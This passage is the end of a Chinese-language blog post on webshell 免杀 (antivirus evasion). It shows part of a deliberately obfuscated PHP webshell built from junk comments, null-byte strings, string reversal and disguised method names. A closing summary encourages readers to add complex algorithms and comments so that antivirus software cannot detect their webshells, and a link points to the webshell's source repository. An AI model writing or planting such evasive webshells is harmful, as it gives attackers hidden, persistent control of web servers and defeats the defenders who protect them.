  195.         gjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/getLockerStatus() {
  196.             global $text;$text =/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\
  197.             00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/strrev($text);
  198.             if ($this -> blockA ===$this -> blockB and $this -> blockA === $this -> blockC and $this -> blockA === $this -> blockD) return true;
  199.             else return false;
  200.         }
  201.     }
  203.     function pause($obj) {
  204.         global $appor5nnb;
  205.         if (!$appor5nnb -> getLockerStatus()) die();
  206.         return $obj;
  207.     }
  209.     $appor5nnb = new InazumaPuzzle();
  210.     $appor5nnb -> __AFG50CE4_RG1();
  211.     $cvb33ff55 = new PerlinNoise(3000, 700.4, 56.7, "DIFF_PERLIN");
  212.     $cvb33ff55->__BHUYTVV8_1();
  213.     $cvb33ff55 -> __CPRBB0R0_l();
  214.     $cvb33ff55 ->__HNBB70CA_5();  
  215. ?>

这个代码看着就乱,根本读不下去,里面很多无用代码,很容易被误导,读不懂。
图片.png

图片.png

图片.png

总结

webshell的免杀有很多方式,师傅们可以多加一些复杂的算法和注释进去,让代码变得混乱,这样杀毒软件就很难检测了。

参考

https://github.com/misaka19008/PerlinPuzzle-Webshell-PHP/blob/master/perlin.php
https://zhuanlan.zhihu.com/p/206271895?ivk_sa=1024320u&utm_id=0
https://www.miyoushe.com/ys/article/17414097
https://blog.csdn.net/qq_45521281/article/details/105849770

  • 发表于 2025-03-10 11:17:55
  • 阅读 ( 2250 )
  • 分类:WEB安全

1 条评论

Werqy3
Werqy3

6 篇文章

Werqy3

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计